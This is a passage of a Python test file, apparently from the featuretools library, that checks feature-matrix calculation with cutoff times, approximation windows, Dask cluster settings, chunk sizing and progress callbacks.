cutoff_time=cutoff_time)
vals1 = feature_matrix[sess_to_cust.get_name()].tolist()
assert vals1 == [8.5, 7]
vals2 = feature_matrix[agg_feat.get_name()].tolist()
assert vals2 == [4, 1.5]
def test_approximate_time_split_returns_the_same_result(pd_es):
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-09 10:07:30'),
pd.Timestamp('2011-04-09 10:07:40')],
'instance_id': [0, 0]})
feature_matrix_at_once = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_df)
divided_matrices = []
separate_cutoff = [cutoff_df.iloc[0:1], cutoff_df.iloc[1:]]
# Make sure indexes are different
# Not that this step is unecessary and done to showcase the issue here
separate_cutoff[0].index = [0]
separate_cutoff[1].index = [1]
for ct in separate_cutoff:
fm = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=ct)
divided_matrices.append(fm)
feature_matrix_from_split = pd.concat(divided_matrices)
assert feature_matrix_from_split.shape == feature_matrix_at_once.shape
for i1, i2 in zip(feature_matrix_at_once.index, feature_matrix_from_split.index):
assert (pd.isnull(i1) and pd.isnull(i2)) or (i1 == i2)
for c in feature_matrix_from_split:
for i1, i2 in zip(feature_matrix_at_once[c], feature_matrix_from_split[c]):
assert (pd.isnull(i1) and pd.isnull(i2)) or (i1 == i2)
def test_approximate_returns_correct_empty_default_values(pd_es):
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['customers'], primitive=Count)
dfeat = DirectFeature(agg_feat, pd_es['sessions'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-08 11:00:00'),
pd.Timestamp('2011-04-09 11:00:00')],
'instance_id': [0, 0]})
fm = calculate_feature_matrix([dfeat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_df)
assert fm[dfeat.get_name()].tolist() == [0, 10]
# def test_approximate_deep_recurse(pd_es):
# pd_es = pd_es
# agg_feat = ft.Feature(pd_es['customers']['id'], parent_entity=pd_es[u'régions'], primitive=Count)
# dfeat1 = DirectFeature(agg_feat, pd_es['sessions'])
# agg_feat2 = Sum(dfeat1, pd_es['customers'])
# dfeat2 = DirectFeature(agg_feat2, pd_es['sessions'])
# agg_feat3 = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['products'], primitive=Count)
# dfeat3 = DirectFeature(agg_feat3, pd_es['log'])
# agg_feat4 = Sum(dfeat3, pd_es['sessions'])
# feature_matrix = calculate_feature_matrix([dfeat2, agg_feat4],
# pd_es,
# instance_ids=[0, 2],
# approximate=Timedelta(10, 's'),
# cutoff_time=[datetime(2011, 4, 9, 10, 31, 19),
# datetime(2011, 4, 9, 11, 0, 0)])
# # dfeat2 and agg_feat4 should both be approximated
def test_approximate_child_aggs_handled_correctly(pd_es):
agg_feat = ft.Feature(pd_es['customers']['id'], parent_entity=pd_es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, pd_es['customers'])
agg_feat_2 = ft.Feature(pd_es['log']['value'], parent_entity=pd_es['customers'], primitive=Sum)
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-08 10:30:00'),
pd.Timestamp('2011-04-09 10:30:06')],
'instance_id': [0, 0]})
fm = calculate_feature_matrix([dfeat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_df)
fm_2 = calculate_feature_matrix([dfeat, agg_feat_2],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_df)
assert fm[dfeat.get_name()].tolist() == [2, 3]
assert fm_2[agg_feat_2.get_name()].tolist() == [0, 5]
def test_cutoff_time_naming(es):
agg_feat = ft.Feature(es['customers']['id'], parent_entity=es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, es['customers'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-08 10:30:00'),
pd.Timestamp('2011-04-09 10:30:06')],
'instance_id': [0, 0]})
cutoff_df_index_name = cutoff_df.rename(columns={"instance_id": "id"})
cutoff_df_wrong_index_name = cutoff_df.rename(columns={"instance_id": "wrong_id"})
cutoff_df_wrong_time_name = cutoff_df.rename(columns={"time": "cutoff_time"})
fm1 = calculate_feature_matrix([dfeat], es, cutoff_time=cutoff_df)
fm1 = to_pandas(fm1, index='id', sort_index=True)
fm2 = calculate_feature_matrix([dfeat], es, cutoff_time=cutoff_df_index_name)
fm2 = to_pandas(fm2, index='id', sort_index=True)
assert all((fm1 == fm2.values).values)
error_text = 'Cutoff time DataFrame must contain a column with either the same name' \
' as the target entity index or a column named "instance_id"'
with pytest.raises(AttributeError, match=error_text):
calculate_feature_matrix([dfeat], es, cutoff_time=cutoff_df_wrong_index_name)
time_error_text = 'Cutoff time DataFrame must contain a column with either the same name' \
' as the target entity time_index or a column named "time"'
with pytest.raises(AttributeError, match=time_error_text):
calculate_feature_matrix([dfeat], es, cutoff_time=cutoff_df_wrong_time_name)
# TODO: order doesn't match, but output matches
def test_cutoff_time_extra_columns(es):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('Distributed result not ordered')
agg_feat = ft.Feature(es['customers']['id'], parent_entity=es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, es['customers'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-09 10:30:06'),
pd.Timestamp('2011-04-09 10:30:03'),
pd.Timestamp('2011-04-08 10:30:00')],
'instance_id': [0, 1, 0],
'label': [True, True, False]},
columns=['time', 'instance_id', 'label'])
fm = calculate_feature_matrix([dfeat], es, cutoff_time=cutoff_df)
# check column was added to end of matrix
assert 'label' == fm.columns[-1]
assert (fm['label'].values == cutoff_df['label'].values).all()
def test_cutoff_time_extra_columns_approximate(pd_es):
agg_feat = ft.Feature(pd_es['customers']['id'], parent_entity=pd_es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, pd_es['customers'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-09 10:30:06'),
pd.Timestamp('2011-04-09 10:30:03'),
pd.Timestamp('2011-04-08 10:30:00')],
'instance_id': [0, 1, 0],
'label': [True, True, False]},
columns=['time', 'instance_id', 'label'])
fm = calculate_feature_matrix([dfeat],
pd_es,
cutoff_time=cutoff_df,
approximate="2 days")
# check column was added to end of matrix
assert 'label' in fm.columns
assert (fm['label'].values == cutoff_df['label'].values).all()
def test_cutoff_time_extra_columns_same_name(es):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('Distributed result not ordered')
agg_feat = ft.Feature(es['customers']['id'], parent_entity=es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, es['customers'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-09 10:30:06'),
pd.Timestamp('2011-04-09 10:30:03'),
pd.Timestamp('2011-04-08 10:30:00')],
'instance_id': [0, 1, 0],
'régions.COUNT(customers)': [False, False, True]},
columns=['time', 'instance_id', 'régions.COUNT(customers)'])
fm = calculate_feature_matrix([dfeat], es, cutoff_time=cutoff_df)
assert (fm['régions.COUNT(customers)'].values == cutoff_df['régions.COUNT(customers)'].values).all()
def test_cutoff_time_extra_columns_same_name_approximate(pd_es):
agg_feat = ft.Feature(pd_es['customers']['id'], parent_entity=pd_es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, pd_es['customers'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-09 10:30:06'),
pd.Timestamp('2011-04-09 10:30:03'),
pd.Timestamp('2011-04-08 10:30:00')],
'instance_id': [0, 1, 0],
'régions.COUNT(customers)': [False, False, True]},
columns=['time', 'instance_id', 'régions.COUNT(customers)'])
fm = calculate_feature_matrix([dfeat],
pd_es,
cutoff_time=cutoff_df,
approximate="2 days")
assert (fm['régions.COUNT(customers)'].values == cutoff_df['régions.COUNT(customers)'].values).all()
def test_instances_after_cutoff_time_removed(es):
property_feature = ft.Feature(es['log']['id'], parent_entity=es['customers'], primitive=Count)
cutoff_time = datetime(2011, 4, 8)
fm = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time,
cutoff_time_in_index=True)
fm = to_pandas(fm, index='id', sort_index=True)
actual_ids = [id for (id, _) in fm.index] if isinstance(fm.index, pd.MultiIndex) else fm.index
# Customer with id 1 should be removed
assert set(actual_ids) == set([2, 0])
# TODO: Dask and Koalas do not keep instance_id after cutoff
def test_instances_with_id_kept_after_cutoff(es):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('Distributed result not ordered, missing extra instances')
property_feature = ft.Feature(es['log']['id'], parent_entity=es['customers'], primitive=Count)
cutoff_time = datetime(2011, 4, 8)
fm = calculate_feature_matrix([property_feature],
es,
instance_ids=[0, 1, 2],
cutoff_time=cutoff_time,
cutoff_time_in_index=True)
# Customer #1 is after cutoff, but since it is included in instance_ids it
# should be kept.
actual_ids = [id for (id, _) in fm.index] if isinstance(fm.index, pd.MultiIndex) else fm.index
assert set(actual_ids) == set([0, 1, 2])
# TODO: Fails with Dask
# TODO: Fails with Koalas
def test_cfm_returns_original_time_indexes(es):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('Distributed result not ordered, indexes are lost due to not multiindexing')
agg_feat = ft.Feature(es['customers']['id'], parent_entity=es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, es['customers'])
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-09 10:30:06'),
pd.Timestamp('2011-04-09 10:30:03'),
pd.Timestamp('2011-04-08 10:30:00')],
'instance_id': [0, 1, 0]})
fm = calculate_feature_matrix([dfeat],
es, cutoff_time=cutoff_df,
cutoff_time_in_index=True)
instance_level_vals = fm.index.get_level_values(0).values
time_level_vals = fm.index.get_level_values(1).values
assert (instance_level_vals == cutoff_df['instance_id'].values).all()
assert (time_level_vals == cutoff_df['time'].values).all()
def test_cfm_returns_original_time_indexes_approximate(pd_es):
agg_feat = ft.Feature(pd_es['customers']['id'], parent_entity=pd_es[u'régions'], primitive=Count)
dfeat = DirectFeature(agg_feat, pd_es['customers'])
agg_feat_2 = ft.Feature(pd_es['sessions']['id'], parent_entity=pd_es['customers'], primitive=Count)
cutoff_df = pd.DataFrame({'time': [pd.Timestamp('2011-04-09 10:30:06'),
pd.Timestamp('2011-04-09 10:30:03'),
pd.Timestamp('2011-04-08 10:30:00')],
'instance_id': [0, 1, 0]})
# approximate, in different windows, no unapproximated aggs
fm = calculate_feature_matrix([dfeat], pd_es, cutoff_time=cutoff_df,
cutoff_time_in_index=True, approximate="1 m")
instance_level_vals = fm.index.get_level_values(0).values
time_level_vals = fm.index.get_level_values(1).values
assert (instance_level_vals == cutoff_df['instance_id'].values).all()
assert (time_level_vals == cutoff_df['time'].values).all()
# approximate, in different windows, unapproximated aggs
fm = calculate_feature_matrix([dfeat, agg_feat_2], pd_es, cutoff_time=cutoff_df,
cutoff_time_in_index=True, approximate="1 m")
instance_level_vals = fm.index.get_level_values(0).values
time_level_vals = fm.index.get_level_values(1).values
assert (instance_level_vals == cutoff_df['instance_id'].values).all()
assert (time_level_vals == cutoff_df['time'].values).all()
# approximate, in same window, no unapproximated aggs
fm2 = calculate_feature_matrix([dfeat], pd_es, cutoff_time=cutoff_df,
cutoff_time_in_index=True, approximate="2 d")
instance_level_vals = fm2.index.get_level_values(0).values
time_level_vals = fm2.index.get_level_values(1).values
assert (instance_level_vals == cutoff_df['instance_id'].values).all()
assert (time_level_vals == cutoff_df['time'].values).all()
# approximate, in same window, unapproximated aggs
fm3 = calculate_feature_matrix([dfeat, agg_feat_2], pd_es, cutoff_time=cutoff_df,
cutoff_time_in_index=True, approximate="2 d")
instance_level_vals = fm3.index.get_level_values(0).values
time_level_vals = fm3.index.get_level_values(1).values
assert (instance_level_vals == cutoff_df['instance_id'].values).all()
assert (time_level_vals == cutoff_df['time'].values).all()
def test_dask_kwargs(pd_es):
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[datetime(2011, 4, 9, 10, 40, 0)] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
labels = [False] * 3 + [True] * 2 + [False] * 9 + [True] + [False] * 2
cutoff_time = pd.DataFrame({'time': times, 'instance_id': range(17)})
property_feature = IdentityFeature(pd_es['log']['value']) > 10
with cluster() as (scheduler, [a, b]):
dkwargs = {'cluster': scheduler['address']}
feature_matrix = calculate_feature_matrix([property_feature],
entityset=pd_es,
cutoff_time=cutoff_time,
verbose=True,
chunk_size=.13,
dask_kwargs=dkwargs,
approximate='1 hour')
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
def test_dask_persisted_es(pd_es, capsys):
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[datetime(2011, 4, 9, 10, 40, 0)] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
labels = [False] * 3 + [True] * 2 + [False] * 9 + [True] + [False] * 2
cutoff_time = pd.DataFrame({'time': times, 'instance_id': range(17)})
property_feature = IdentityFeature(pd_es['log']['value']) > 10
with cluster() as (scheduler, [a, b]):
dkwargs = {'cluster': scheduler['address']}
feature_matrix = calculate_feature_matrix([property_feature],
entityset=pd_es,
cutoff_time=cutoff_time,
verbose=True,
chunk_size=.13,
dask_kwargs=dkwargs,
approximate='1 hour')
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
feature_matrix = calculate_feature_matrix([property_feature],
entityset=pd_es,
cutoff_time=cutoff_time,
verbose=True,
chunk_size=.13,
dask_kwargs=dkwargs,
approximate='1 hour')
captured = capsys.readouterr()
assert "Using EntitySet persisted on the cluster as dataset " in captured[0]
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
class TestCreateClientAndCluster(object):
def test_user_cluster_as_string(self, monkeypatch):
monkeypatch.setattr(utils, "get_client_cluster",
get_mock_client_cluster)
# cluster in dask_kwargs case
client, cluster = create_client_and_cluster(n_jobs=2,
dask_kwargs={'cluster': 'tcp://127.0.0.1:54321'},
entityset_size=1)
assert cluster == 'tcp://127.0.0.1:54321'
def test_cluster_creation(self, monkeypatch):
total_memory = psutil.virtual_memory().total
monkeypatch.setattr(utils, "get_client_cluster",
get_mock_client_cluster)
try:
cpus = len(psutil.Process().cpu_affinity())
except AttributeError:
cpus = psutil.cpu_count()
# jobs < tasks case
client, cluster = create_client_and_cluster(n_jobs=2,
dask_kwargs={},
entityset_size=1)
num_workers = min(cpus, 2)
memory_limit = int(total_memory / float(num_workers))
assert cluster == (min(cpus, 2), 1, None, memory_limit)
# jobs > tasks case
match = r'.*workers requested, but only .* workers created'
with pytest.warns(UserWarning, match=match) as record:
client, cluster = create_client_and_cluster(n_jobs=1000,
dask_kwargs={'diagnostics_port': 8789},
entityset_size=1)
assert len(record) == 1
num_workers = cpus
memory_limit = int(total_memory / float(num_workers))
assert cluster == (num_workers, 1, 8789, memory_limit)
# dask_kwargs sets memory limit
client, cluster = create_client_and_cluster(n_jobs=2,
dask_kwargs={'diagnostics_port': 8789,
'memory_limit': 1000},
entityset_size=1)
num_workers = min(cpus, 2)
assert cluster == (num_workers, 1, 8789, 1000)
def test_not_enough_memory(self, monkeypatch):
total_memory = psutil.virtual_memory().total
monkeypatch.setattr(utils, "get_client_cluster",
get_mock_client_cluster)
# errors if not enough memory for each worker to store the entityset
with pytest.raises(ValueError, match=''):
create_client_and_cluster(n_jobs=1,
dask_kwargs={},
entityset_size=total_memory * 2)
# does not error even if worker memory is less than 2x entityset size
create_client_and_cluster(n_jobs=1,
dask_kwargs={},
entityset_size=total_memory * .75)
def test_parallel_failure_raises_correct_error(pd_es):
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[datetime(2011, 4, 9, 10, 40, 0)] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
cutoff_time = pd.DataFrame({'time': times, 'instance_id': range(17)})
property_feature = IdentityFeature(pd_es['log']['value']) > 10
error_text = 'Need at least one worker'
with pytest.raises(AssertionError, match=error_text):
calculate_feature_matrix([property_feature],
entityset=pd_es,
cutoff_time=cutoff_time,
verbose=True,
chunk_size=.13,
n_jobs=0,
approximate='1 hour')
def test_warning_not_enough_chunks(pd_es, capsys):
property_feature = IdentityFeature(pd_es['log']['value']) > 10
with cluster(nworkers=3) as (scheduler, [a, b, c]):
dkwargs = {'cluster': scheduler['address']}
calculate_feature_matrix([property_feature],
entityset=pd_es,
chunk_size=.5,
verbose=True,
dask_kwargs=dkwargs)
captured = capsys.readouterr()
pattern = r'Fewer chunks \([0-9]+\), than workers \([0-9]+\) consider reducing the chunk size'
assert re.search(pattern, captured.out) is not None
def test_n_jobs():
try:
cpus = len(psutil.Process().cpu_affinity())
except AttributeError:
cpus = psutil.cpu_count()
assert n_jobs_to_workers(1) == 1
assert n_jobs_to_workers(-1) == cpus
assert n_jobs_to_workers(cpus) == cpus
assert n_jobs_to_workers((cpus + 1) * -1) == 1
if cpus > 1:
assert n_jobs_to_workers(-2) == cpus - 1
error_text = 'Need at least one worker'
with pytest.raises(AssertionError, match=error_text):
n_jobs_to_workers(0)
# TODO: add dask version of int_es
def test_integer_time_index(int_es):
times = list(range(8, 18)) + list(range(19, 26))
labels = [False] * 3 + [True] * 2 + [False] * 9 + [True] + [False] * 2
cutoff_df = pd.DataFrame({'time': times, 'instance_id': range(17)})
property_feature = IdentityFeature(int_es['log']['value']) > 10
feature_matrix = calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_df,
cutoff_time_in_index=True)
time_level_vals = feature_matrix.index.get_level_values(1).values
sorted_df = cutoff_df.sort_values(['time', 'instance_id'], kind='mergesort')
assert (time_level_vals == sorted_df['time'].values).all()
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
def test_integer_time_index_single_cutoff_value(int_es):
labels = [False] * 3 + [True] * 2 + [False] * 4
property_feature = IdentityFeature(int_es['log']['value']) > 10
cutoff_times = [16, pd.Series([16])[0], 16.0, pd.Series([16.0])[0]]
for cutoff_time in cutoff_times:
feature_matrix = calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_time,
cutoff_time_in_index=True)
time_level_vals = feature_matrix.index.get_level_values(1).values
assert (time_level_vals == [16] * 9).all()
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
# TODO: add dask version of int_es
def test_integer_time_index_datetime_cutoffs(int_es):
times = [datetime.now()] * 17
cutoff_df = pd.DataFrame({'time': times, 'instance_id': range(17)})
property_feature = IdentityFeature(int_es['log']['value']) > 10
error_text = "cutoff_time times must be numeric: try casting via pd\\.to_numeric\\(\\)"
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_df,
cutoff_time_in_index=True)
# TODO: add Dask version of int_es
def test_integer_time_index_passes_extra_columns(int_es):
times = list(range(8, 18)) + list(range(19, 23)) + [25, 24, 23]
labels = [False] * 3 + [True] * 2 + [False] * 9 + [False] * 2 + [True]
instances = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 16, 15, 14]
cutoff_df = pd.DataFrame({'time': times,
'instance_id': instances,
'labels': labels})
cutoff_df = cutoff_df[['time', 'instance_id', 'labels']]
property_feature = IdentityFeature(int_es['log']['value']) > 10
fm = calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_df,
cutoff_time_in_index=True)
assert (fm[property_feature.get_name()] == fm['labels']).all()
# TODO: add Dask version of int_es
def test_integer_time_index_mixed_cutoff(int_es):
times_dt = list(range(8, 17)) + [datetime(2011, 1, 1), 19, 20, 21, 22, 25, 24, 23]
labels = [False] * 3 + [True] * 2 + [False] * 9 + [False] * 2 + [True]
instances = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 16, 15, 14]
cutoff_df = pd.DataFrame({'time': times_dt,
'instance_id': instances,
'labels': labels})
cutoff_df = cutoff_df[['time', 'instance_id', 'labels']]
property_feature = IdentityFeature(int_es['log']['value']) > 10
error_text = 'cutoff_time times must be.*try casting via.*'
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_df)
times_str = list(range(8, 17)) + ["foobar", 19, 20, 21, 22, 25, 24, 23]
cutoff_df['time'] = times_str
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_df)
times_date_str = list(range(8, 17)) + ['2018-04-02', 19, 20, 21, 22, 25, 24, 23]
cutoff_df['time'] = times_date_str
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_df)
times_int_str = [0, 1, 2, 3, 4, 5, '6', 7, 8, 9, 9, 10, 11, 12, 15, 14, 13]
times_int_str = list(range(8, 17)) + ['17', 19, 20, 21, 22, 25, 24, 23]
cutoff_df['time'] = times_int_str
# calculate_feature_matrix should convert time column to ints successfully here
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
int_es,
cutoff_time=cutoff_df)
def test_datetime_index_mixed_cutoff(es):
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[17] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
labels = [False] * 3 + [True] * 2 + [False] * 9 + [False] * 2 + [True]
instances = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 16, 15, 14]
cutoff_df = pd.DataFrame({'time': times,
'instance_id': instances,
'labels': labels})
cutoff_df = cutoff_df[['time', 'instance_id', 'labels']]
property_feature = IdentityFeature(es['log']['value']) > 10
error_text = 'cutoff_time times must be.*try casting via.*'
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_df)
times[9] = "foobar"
cutoff_df['time'] = times
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_df)
cutoff_df['time'].iloc[9] = '2018-04-02 18:50:45.453216'
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_df)
times[9] = '17'
cutoff_df['time'] = times
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_df)
def test_string_time_values_in_cutoff_time(es):
times = ['2011-04-09 10:31:27', '2011-04-09 10:30:18']
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 0]})
agg_feature = ft.Feature(es['log']['value'], parent_entity=es['customers'], primitive=Sum)
error_text = 'cutoff_time times must be.*try casting via.*'
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([agg_feature], es, cutoff_time=cutoff_time)
# TODO: Dask version fails (feature matrix is empty)
# TODO: Koalas version fails (koalas groupby agg doesn't support custom functions)
def test_no_data_for_cutoff_time(mock_customer):
if mock_customer.dataframe_type != Library.PANDAS.value:
pytest.xfail("Dask fails because returned feature matrix is empty; Koalas doesn't support custom agg functions")
es = mock_customer
cutoff_times = pd.DataFrame({"customer_id": [4],
"time": pd.Timestamp('2011-04-08 20:08:13')})
trans_per_session = ft.Feature(es["transactions"]["transaction_id"], parent_entity=es["sessions"], primitive=Count)
trans_per_customer = ft.Feature(es["transactions"]["transaction_id"], parent_entity=es["customers"], primitive=Count)
features = [trans_per_customer, ft.Feature(trans_per_session, parent_entity=es["customers"], primitive=Max)]
fm = calculate_feature_matrix(features, entityset=es, cutoff_time=cutoff_times)
# due to default values for each primitive
# count will be 0, but max will nan
np.testing.assert_array_equal(fm.values, [[0, np.nan]])
# adding missing instances not supported in Dask or Koalas
def test_instances_not_in_data(pd_es):
last_instance = max(pd_es['log'].df.index.values)
instances = list(range(last_instance + 1, last_instance + 11))
identity_feature = IdentityFeature(pd_es['log']['value'])
property_feature = identity_feature > 10
agg_feat = AggregationFeature(pd_es['log']['value'],
parent_entity=pd_es["sessions"],
primitive=Max)
direct_feature = DirectFeature(agg_feat, pd_es["log"])
features = [identity_feature, property_feature, direct_feature]
fm = calculate_feature_matrix(features, entityset=pd_es, instance_ids=instances)
assert all(fm.index.values == instances)
for column in fm.columns:
assert fm[column].isnull().all()
fm = calculate_feature_matrix(features,
entityset=pd_es,
instance_ids=instances,
approximate="730 days")
assert all(fm.index.values == instances)
for column in fm.columns:
assert fm[column].isnull().all()
def test_some_instances_not_in_data(pd_es):
a_time = datetime(2011, 4, 10, 10, 41, 9) # only valid data
b_time = datetime(2011, 4, 10, 11, 10, 5) # some missing data
c_time = datetime(2011, 4, 10, 12, 0, 0) # all missing data
times = [a_time, b_time, a_time, a_time, b_time, b_time] + [c_time] * 4
cutoff_time = pd.DataFrame({"instance_id": list(range(12, 22)),
"time": times})
identity_feature = IdentityFeature(pd_es['log']['value'])
property_feature = identity_feature > 10
agg_feat = AggregationFeature(pd_es['log']['value'],
parent_entity=pd_es["sessions"],
primitive=Max)
direct_feature = DirectFeature(agg_feat, pd_es["log"])
features = [identity_feature, property_feature, direct_feature]
fm = calculate_feature_matrix(features,
entityset=pd_es,
cutoff_time=cutoff_time)
ifeat_answer = [0, 7, 14, np.nan] + [np.nan] * 6
prop_answer = [0, 0, 1, np.nan, 0] + [np.nan] * 5
dfeat_answer = [14, 14, 14, np.nan] + [np.nan] * 6
assert all(fm.index.values == cutoff_time["instance_id"].values)
for x, y in zip(fm.columns, [ifeat_answer, prop_answer, dfeat_answer]):
np.testing.assert_array_equal(fm[x], y)
fm = calculate_feature_matrix(features,
entityset=pd_es,
cutoff_time=cutoff_time,
approximate="5 seconds")
dfeat_answer[0] = 7 # approximate calculated before 14 appears
dfeat_answer[2] = 7 # approximate calculated before 14 appears
prop_answer[3] = 0 # no_unapproximated_aggs code ignores cutoff time
assert all(fm.index.values == cutoff_time["instance_id"].values)
for x, y in zip(fm.columns, [ifeat_answer, prop_answer, dfeat_answer]):
np.testing.assert_array_equal(fm[x], y)
def test_missing_instances_with_categorical_index(pd_es):
instance_ids = [0, 1, 3, 2]
features = ft.dfs(entityset=pd_es, target_entity='customers', features_only=True)
fm = calculate_feature_matrix(entityset=pd_es,
features=features,
instance_ids=instance_ids)
assert all(fm.index.values == instance_ids)
assert isinstance(fm.index, pd.CategoricalIndex)
def test_handle_chunk_size():
total_size = 100
# user provides no chunk size
assert _handle_chunk_size(None, total_size) is None
# user provides fractional size
assert _handle_chunk_size(.1, total_size) == total_size * .1
assert _handle_chunk_size(.001, total_size) == 1 # rounds up
assert _handle_chunk_size(.345, total_size) == 35 # rounds up
# user provides absolute size
assert _handle_chunk_size(1, total_size) == 1
assert _handle_chunk_size(100, total_size) == 100
assert isinstance(_handle_chunk_size(100.0, total_size), int)
# test invalid cases
with pytest.raises(AssertionError, match="Chunk size must be greater than 0"):
_handle_chunk_size(0, total_size)
with pytest.raises(AssertionError, match="Chunk size must be greater than 0"):
_handle_chunk_size(-1, total_size)
def test_chunk_dataframe_groups():
df = pd.DataFrame({
"group": [1, 1, 1, 1, 2, 2, 3]
})
grouped = df.groupby("group")
chunked_grouped = _chunk_dataframe_groups(grouped, 2)
# test group larger than chunk size gets split up
first = next(chunked_grouped)
assert first[0] == 1 and first[1].shape[0] == 2
second = next(chunked_grouped)
assert second[0] == 1 and second[1].shape[0] == 2
# test that equal to and less than chunk size stays together
third = next(chunked_grouped)
assert third[0] == 2 and third[1].shape[0] == 2
fourth = next(chunked_grouped)
assert fourth[0] == 3 and fourth[1].shape[0] == 1
def test_calls_progress_callback(mock_customer):
class MockProgressCallback:
def __init__(self):
self.progress_history = []
self.total_update = 0
self.total_progress_percent = 0
def __call__(self, update, progress_percent, time_elapsed):
self.total_update += update
self.total_progress_percent = progress_percent
self.progress_history.append(progress_percent)
mock_progress_callback = MockProgressCallback()
es = mock_customer
# make sure to calculate features that have different paths to same base feature
trans_per_session = ft.Feature(es["transactions"]["transaction_id"], parent_entity=es["sessions"], primitive=Count)
trans_per_customer = ft.Feature(es["transactions"]["transaction_id"], parent_entity=es["customers"], primitive=Count)
features = [trans_per_session, ft.Feature(trans_per_customer, entity=es["sessions"])]
calculate_feature_matrix(features, entityset=es, progress_callback=mock_progress_callback)
# second to last entry is the last update from feature calculation
assert np.isclose(mock_progress_callback.progress_history[-2], FEATURE_CALCULATION_PERCENTAGE * 100)
assert np.isclose(mock_progress_callback.total_update, 100.0)
assert np.isclose(mock_progress_callback.total_progress_percent, 100.0)
# test with cutoff time dataframe
mock_progress_callback = MockProgressCallback()
cutoff_time = pd.DataFrame({"instance_id": [1, 2, 3],
"time": [pd.to_datetime("2014-01-01 01:00:00"),
pd.to_datetime("2014-01-01 02:00:00"),
pd.to_datetime("2014-01-01 03:00:00")]})
calculate_feature_matrix(features, entityset=es, cutoff_time=cutoff_time, progress_callback=mock_progress_callback)
